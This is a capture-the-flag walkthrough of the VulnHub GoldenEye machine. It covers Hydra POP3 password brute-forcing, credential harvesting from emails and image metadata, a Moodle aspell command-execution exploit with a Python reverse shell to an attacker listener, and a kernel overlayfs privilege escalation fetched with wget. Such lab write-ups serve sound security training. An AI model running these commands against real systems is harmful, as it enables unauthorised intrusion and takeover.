GoldenEye Vulnub machine writeup

GoldenEye Vulnub machine writeup
GoldenEye default web page
GoldenEye from vulnhub is an intermediate level box which is good one to practice for OSCP or CTF players.

You will learn multiple techniques like:
– Scanning
– Web enumeration and decoding
– Hydra brute force pop3
– Local privilege escalation

1. Scanning:

# nmap -A -p- -T5 10.10.0.130

-A : Aggressive scan
-p-: scan all ports
-T5: aggressive timing scan [as it is local VM, not recommended for internet located machines]

goldenEye nmap scan

We found HTTP port 80, 55006/tcp, 55007/tcp (pop3 non-standard port)

2. Web Enumeration:

– Browse http://10.10.0.130/, it sayes “Naviagate to /sev-home/ to login “, That is interseting.

GoldenEye default web page

– View the page source, we notice terminal.js script, open it and read through, we got user Boris and encoded password.

terminal.js goldenEye
Using burp suite to decode it as HTML, results in the password: InvincibleHack3r

burp suite decode as HTML

It also mentioned user Natalya !!

– Now Let’s navigate to /sev-home/ to login with the collected credentials, and here we are.

– So, it seems they are using email for communications, I will give it a try using boris credentials.

3. POP3 brute force :

# nc 10.10.0.130 55007

USER boris
PASS InvincibleHack3r

But it failed, so we need to crack the password.

I am going to use hydra brute-force tool with a small dictionary, if it fails I will use a bigger one.

hydra pop3 brute force boris

# hydra -l boris -P /usr/share/wordlists/fasttrack.txt -s 55007 pop3://10.10.0.130

Nice, we got a password secret1! for user boris.

login and retrieve the 3 messages using RETR command.

pop3 retrieve emails cli

# nc 10.10.0.130 55007
+OK GoldenEye POP3 Electronic-Mail System
USER boris
+OK
PASS secret1!
+OK Logged in.
list
+OK 3 messages:
1 544
2 373
3 921
.
RETR 1
From: root@127.0.0.1.goldeneye

Boris, this is admin. You can electronically communicate to co-workers and students here. I’m not going to scan emails for security risks because I trust you and the other admins here.

RETR 2
From: natalya@ubuntu

Boris, I can break your codes!
.
RETR 3
From: alec@janus.boss

Boris,

Your cooperation with our syndicate will pay off big. Attached are the final access codes for GoldenEye. Place them in a hidden file within the root directory of this server then remove from this email. There can only be one set of these acces codes, and we need to secure them for the final execution. If they are retrieved and captured our plan will crash and burn!

Once Xenia gets access to the training site and becomes familiar with the GoldenEye Terminal codes we will push to our final stages….

PS – Keep security tight or we will be compromised.
.

Notice that natalya user have an email, it may contain interesting contents, let’s try to login:

hydra pop3 brute force

# hydra -l natalya -P /usr/share/wordlists/fasttrack.txt -s 55007 pop3://10.10.0.130
[55007][pop3] host: 10.10.0.130 login: natalya password: bird

After login and retrieve the second message, we got a user credentials [username: xenia password: RCP90rulez!]
and url to login severnaya-station.com !!

login

add the host name to your /etc/hosts file and browse it, login using the credentials.

message from dr Doak

we have a new private message, read it, we have another user called doak, brute force again for a possible password:

# hydra -l doak -P /usr/share/wordlists/fasttrack.txt -s 55007 pop3://10.10.0.130
[55007][pop3] host: 10.10.0.130 login: doak password: goat

hydra brute force pop3 user doak

Again, read the messages for any interesting info.

# nc 10.10.0.130 55007
+OK GoldenEye POP3 Electronic-Mail System
USER doak
+OK
PASS goat
+OK Logged in.
list
+OK 1 messages:
1 606
.
RETR 1
……….
username: dr_doak
password: 4England!
…….

Login to the web app http://severnaya-station.com using dr_doak credentials:
found a private file s3cret.txt

It mentioned he had admin credentials and Something juicy is located here: /dir007key/for-007.jpg
Download http://severnaya-station.com/dir007key/for-007.jpg

Use strings or exiftools to find any hidden string:

exiftool

# exiftool for-007.jpg

found base64 encoded string, decode it
# echo eFdpbnRlcjE5OTV4IQ== | base64 -d
xWinter1995x!

4. Web reverse shell

It has been a long journey, hope this is the admin credentials [admin:xWinter1995x!], login again:

Nice. we login to as admin, it is a moodle system, more enumeration, it is moodle version 2.2.3

Google for moodle 2.2.3 exploit

found: https://www.exploit-db.com/exploits/29324

– In plugins: change shell to PSpellShell (local) so we can expoit a command execution vulnerability rather than Google spell (online) and save.

PSpellShell

– In server > system paths: put your shell inside Path to aspell and save.

system path to aspell

The one that worked for me from pentestmonkey:
python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.10.0.1”,4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’

Attacker setup a listener:

# nc -nlvp 4444

Just navigate to add a new course to open TinyMCE HTML editor, click on spell Checker icon [The one labeled with ABC with correct sign]

spell checker

we got a shell as www-data user, make it stable, interactive using python pty module :

$ python -c “import pty;pty.spawn(‘/bin/bash’)”

reverse shell

5. Privilege Escalation:

You may upload scripts like linpeas.sh for that, but it is simple as:

# uname -a

Google for kernel 3.13 exploit:
https://www.exploit-db.com/exploits/37292

OR
# searchsploit kernel 3.13

You will get the same result

Compile and upload it to target failed as target doesn’t have gcc compiler which is used in the code,

so modify the exploit before compiling from gcc to cc which found in that line:
from: lib = system(“gcc -fPIC -shared -o /tmp/ofs-lib.so /tmp/ofs-lib.c -ldl -w”);.
To: lib = system(“cc -fPIC -shared -o /tmp/ofs-lib.so /tmp/ofs-lib.c -ldl -w”);.

Then compile and setup simple web server to allow target to download it:

# cc 37292.c -o ofs
# python -m SimpleHTTPServer 80

On target:

$ cd /tmp
$ wget 10.10.0.1/ofs
$ chmod +x ofs
$ ./ofs

# id

capture the flag root GoldenEye vulnhub machine

Thanks

Comments are closed.